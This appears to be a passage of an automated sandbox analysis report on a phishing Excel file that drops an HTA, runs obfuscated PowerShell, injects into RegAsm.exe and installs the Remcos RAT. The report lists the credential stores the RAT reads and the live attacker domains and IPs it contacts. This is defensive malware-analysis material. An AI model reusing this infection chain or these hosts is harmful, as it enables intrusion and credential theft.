                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,23_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,28_2_004082CD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,31_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0041739B GetVersionExW,26_2_0041739B
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.527567335.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879261278.0000000000895000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.0000000000901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.880062392.0000000000D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data31_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\31_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db31_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword28_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword28_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword28_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3888, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0BYJUE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0BYJUE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.527567335.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879261278.0000000000895000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.0000000000901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.880062392.0000000000D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe31_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting
                    Valid Accounts11
                    Native API
                    121
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    13
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts23
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    21
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts223
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    Install Root Certificate
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares21
                    Email Collection
                    1
                    Remote Access Software
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Credentials In Files
                    4
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell
                    Network Logon Script322
                    Process Injection
                    1
                    Bypass User Account Control
                    LSA Secrets39
                    System Information Discovery
                    SSH4
                    Clipboard Data
                    213
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials3
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1529029 Sample: Maersk BL, IN & PL.xls Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 21 other signatures 2->112 13 EXCEL.EXE 59 33 2->13         started        process3 dnsIp4 102 38.240.44.9, 49162, 49164, 49165 COGENT-174US United States 13->102 104 wrath.me 188.114.96.3, 443, 49161, 49167 CLOUDFLARENETUS European Union 13->104 84 C:\Users\...\Maersk BL, IN & PL.xls (copy), Composite 13->84 dropped 86 C:\Users\...\verynicepersonupdation[1].hta, HTML 13->86 dropped 166 Microsoft Office drops suspicious files 13->166 18 mshta.exe 10 13->18         started        22 mshta.exe 10 13->22         started        file5 signatures6 process7 dnsIp8 88 188.114.97.3, 443, 49163, 49168 CLOUDFLARENETUS European Union 18->88 90 wrath.me 18->90 114 Suspicious command line found 18->114 116 PowerShell case anomaly found 18->116 24 cmd.exe 18->24         started        92 wrath.me 22->92 27 cmd.exe 22->27         started        signatures9 process10 signatures11 138 Suspicious powershell command line found 24->138 140 Wscript starts Powershell (via cmd or directly) 24->140 142 PowerShell case anomaly found 24->142 29 powershell.exe 24 24->29         started        33 powershell.exe 27->33         started        process12 file13 78 C:\Users\...\nicefeaturesworkinggreat.vbS, Unicode 29->78 dropped 80 C:\Users\user\AppData\...\nnmswnbn.cmdline, Unicode 29->80 dropped 148 Suspicious powershell command line found 29->148 150 Obfuscated command line found 29->150 152 Installs new ROOT certificates 29->152 154 Suspicious execution chain found 29->154 35 wscript.exe 1 29->35         started        38 csc.exe 2 29->38         started        41 wscript.exe 33->41         started        43 csc.exe 33->43         started        signatures14 process15 file16 118 Suspicious powershell command line found 35->118 120 Wscript starts Powershell (via cmd or directly) 35->120 122 Bypasses PowerShell execution policy 35->122 124 2 other signatures 35->124 45 powershell.exe 4 35->45         started        74 C:\Users\user\AppData\Local\...\nnmswnbn.dll, PE32 38->74 dropped 48 cvtres.exe 38->48         started        50 powershell.exe 41->50         started        76 C:\Users\user\AppData\Local\...\op4j5mgw.dll, PE32 43->76 dropped 52 cvtres.exe 43->52         started        signatures17 process18 signatures19 144 Suspicious powershell command line found 45->144 146 Obfuscated command line found 45->146 54 powershell.exe 12 4 45->54         started        58 powershell.exe 50->58         started        process20 dnsIp21 94 ia600102.us.archive.org 207.241.227.242, 443, 49166, 49176 INTERNET-ARCHIVEUS United States 54->94 134 Writes to foreign memory regions 54->134 136 Injects a PE file into a foreign processes 54->136 60 RegAsm.exe 54->60         started        65 RegAsm.exe 58->65         started        signatures22 process23 dnsIp24 96 ugnrv.duckdns.org 60->96 98 ugnrv.duckdns.org 192.3.101.184, 49173, 49174, 9674 AS-COLOCROSSINGUS United States 60->98 100 geoplugin.net 178.237.33.50, 49175, 80 ATOM86-ASATOM86NL Netherlands 60->100 82 C:\ProgramData\remcos\logs.dat, data 60->82 dropped 156 Contains functionality to bypass UAC (CMSTPLUA) 60->156 158 Detected Remcos RAT 60->158 160 Tries to steal Mail credentials (via file registry) 60->160 164 7 other signatures 60->164 67 RegAsm.exe 60->67         started        70 RegAsm.exe 60->70         started        72 RegAsm.exe 60->72         started        file25 162 Uses dynamic DNS services 96->162 signatures26 process27 signatures28 126 Tries to steal Instant Messenger accounts or passwords 67->126 128 Tries to steal Mail credentials (via file / registry access) 67->128 130 Searches for Windows Mail specific files 67->130 132 Tries to harvest and steal browser information (history, passwords, etc) 70->132

